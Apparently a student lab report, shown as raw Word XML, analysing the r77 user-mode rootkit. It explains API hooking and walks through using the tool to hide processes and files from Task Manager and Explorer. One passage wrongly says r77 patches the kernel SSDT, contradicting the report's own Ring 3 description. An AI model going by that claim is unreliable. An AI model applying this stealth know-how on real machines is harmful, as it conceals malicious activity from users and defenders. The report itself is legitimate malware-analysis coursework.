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恶意代码分析与防治</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default"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11-2</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r77 rootkit详细分析</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2111033</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艾明旭</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 xml:space="preserve">级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信息安全一班</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>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实验目的</w:t>
      </w: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在使用R77的基础上，撰写技术分析，要求描述使用过程中看到的行为如何技术实现。</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实验原理</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r77-Rootkit是一款功能强大的无文件Ring 3 Rootkit，并且带有完整的安全工具和持久化机制，可以实现进程、文件和网络连接等操作及任务的隐藏。</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r77能够在所有进程中隐藏下列实体：</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文件、目录、连接、命名管道、计划任务；</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进程；</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CPU用量；</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注册表键&amp;值；</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服务；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="748"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TCP&amp;UDP连接；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="75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该工具兼容32位和64位版本的Windows 7以及Windows 10。</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows的Detours机制</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Windows的Detours机制是一种软件技术，用于拦截和修改Win32函数的调用。这是通过API钩子（hooking）实现的，是一种编程技术，允许开发者拦截对动态链接库（DLL）中函数的调用。Detours 通过动态地重写目标函数的机器代码来工作。这种方法通常用于系统监控、程序调试、性能分析等方面。</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在Detours机制中，当一个程序调用某个Win32 API函数时，Detours 可以劫持这个调用，并将它重定向到另一个函数。这个替代函数可以是用户自定义的，也可以是对原函数的扩展或修改。</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利用这种技术，开发者可以在不修改原始代码的情况下，动态地更改程序的行为。</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例如，Detours 可以用于监视和记录文件操作、网络通信或系统调用。它也被用于创建安全工具，如防病毒软件，这些软件需要监视系统级活动以检测恶意行为。然而，同样的技术也可以被用于恶意软件中，用于隐藏其行为，例如隐藏文件、进程或网络连接，这就是你提到的R77程序所做的事情。</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2.2 API Hooking</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API（应用程序编程接口）Hooking是一种编程技术，用于改变或增强操作系统或应用程序的功能。在Windows系统中，API函数通常来自各种动态链接库（DLL）。</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2.2.1 原理</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拦截调用：API Hooking工作原理是拦截对特定API函数的调用。这可以通过多种方式实现，包括修改函数的入口地址（例如，在导入地址表中），或者直接修改函数代码本身（如通过Inline Hooking）。</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重定向调用：当API调用被拦截后，它会被重定向到一个自定义函数。这个自定义函数可以在调用原函数之前或之后执行额外的代码，甚至完全替代原函数。</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2.2.2 应用</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调试和监控：开发人员利用API Hooking来监控和记录应用程序的行为，例如文件访问、网络通信等。</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安全软件：安全软件（如防病毒程序）使用API Hooking来检测和阻止恶意行为。</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系统增强：通过API Hooking，软件可以添加或修改操作系统功能，不需要修改底层代码。</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2.2.3 风险</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稳定性问题：不正确的API Hooking可能导致系统不稳定。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>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安全隐患：恶意软件也可能利用API Hooking来隐藏其行为或损害系统。</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2.3 隐藏进程</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隐藏进程是一种技术，通常用于防止进程在常规工具（如任务管理器）中被检测到。这在恶意软件和某些类型的系统监控软件中很常见。</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2.3.1 实现方法</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修改系统结构：通过修改操作系统的内部数据结构（如进程列表）来隐藏进程。</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拦截系统调用：使用API Hooking或类似技术拦截和修改系统调用，例如拦截列出进程的API调用，并从结果中删除特定进程。</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内核模式驱动：在内核模式下运行的驱动程序可以直接访问和修改操作系统的核心数据结构，进而隐藏进程。</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2.3.2 应用</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安全和隐私：某些合法软件可能出于安全或隐私原因隐藏其进程。</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恶意软件：病毒、木马和rootkits经常隐藏其进程以避免检测。</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2.3.3 风险和挑战</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安全风险：隐藏进程的技术可以被恶意软件利用，对用户和企业造成严重威胁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>检测难度：隐藏进程的技术提高了安全软件检测和清除这些威胁的难度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R77 rootkit隐藏系统信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R77 rootkit主要利用Windows系统的漏洞，通过在内核层面进行修改和隐藏，绕过操作系统和安全软件的监控和防御。它可以隐藏文件、进程和网络连接等系统资源，并且可以通过加密和混淆来逃避杀毒软件和安全工具的检测。R77 rootkit还可以通过修改Windows的系统调用表和SSDT（System Service Descriptor Table）来劫持系统调用和系统服务，从而在不被察觉的情况下进行恶意操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载r77 rootkit后 需要先将比较重要的进程关闭，运行install.exe，注入r77</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>安装工具会将r77服务在用户登录之前开启，后台进程会向所有当前正在运行以及后续生成的进程中注入命令。这里需要使用两个进程来分别注入32位和64位进程，这两个进程都可以使用配置系统和PID来进行隐藏。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“Uninstall.exe”程序负责将r77从系统中卸载掉，并解除Rootkit跟所有进程的绑定关系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="381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333625"/>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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>进程隐藏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R77的进程隐藏功能是一种用于使特定进程在操作系统的常规监视工具（如任务管理器）中不可见的技术。这种隐藏技术主要基于修改操作系统的行为来阻止对特定进程的检测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例进程R77为我们提供了一个可执行文件 $77-Example.exe ，这个文件以$77为开头。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我们运行它：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2918460"/>
            <wp:effectExtent l="0" t="0" r="317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69865" cy="2918460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2568575"/>
            <wp:effectExtent l="0" t="0" r="3810"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9230" cy="2568575"/>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default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里我们设置高cpu占有率，可以在任务管理器里看到改程序占据大量进程，并且电脑的风扇正在高速运转。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意进程隐藏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时运行 Install.exe ，重新打开任务管理器，同时保持这个exe运行，发现找不到这个进程了：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1463675"/>
            <wp:effectExtent l="0" t="0" r="63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2405" cy="1463675"/>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仍然没有找到这个进程，证明其确实被隐藏了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际上，R77默认隐藏了$77开头的进程，但其他进程也可以进行针对性隐藏。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们运行 TestConsole.exe ，可以看到进程列表，包括被隐藏的进程：</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3881120" cy="1936115"/>
            <wp:effectExtent l="0" t="0" r="508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881120" cy="1936115"/>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在上图，为了证明这个程序仍然在运行，只是被隐藏了，我将CPU占用率调为100%。可以看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尽管CPU占用已经满了，但并没有显示这个进程的存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们打开Process Explorer来查看进程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5257800" cy="633222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257800" cy="6332220"/>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随便再找一个任意进程名的进程，选取下面的进程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="434340"/>
            <wp:effectExtent l="0" t="0" r="63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272405" cy="434340"/>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点击右边对应的Hide操作：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="290830"/>
            <wp:effectExtent l="0" t="0" r="635" b="139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272405" cy="290830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="340995"/>
            <wp:effectExtent l="0" t="0" r="127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5271770" cy="340995"/>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再次打开任务管理器查看，该进程已经“消失”，同时右边的Hide选项也已经变成了Unhide:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.3 文件隐藏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R77的文件隐藏功能是一种技术，用于使特定文件或目录在操作系统的标准文件浏览工具（例如Windows资源管理器）中不可见。这通常是通过拦截和修改系统级别的文件系统调用来实现的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先执行uninstall:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4274820" cy="1844040"/>
            <wp:effectExtent l="0" t="0" r="762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4274820" cy="1844040"/>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在一个文件夹里面放入我想要隐藏的文件和文件夹：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后执行Install操作，刷新文件夹：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4472940" cy="2179320"/>
            <wp:effectExtent l="0" t="0" r="762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4472940" cy="2179320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示“此文件夹为空”，文件已经被隐藏成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Detours代码以及分析如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;iostream&gt; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;fstream&gt; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;Windows.h&gt; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
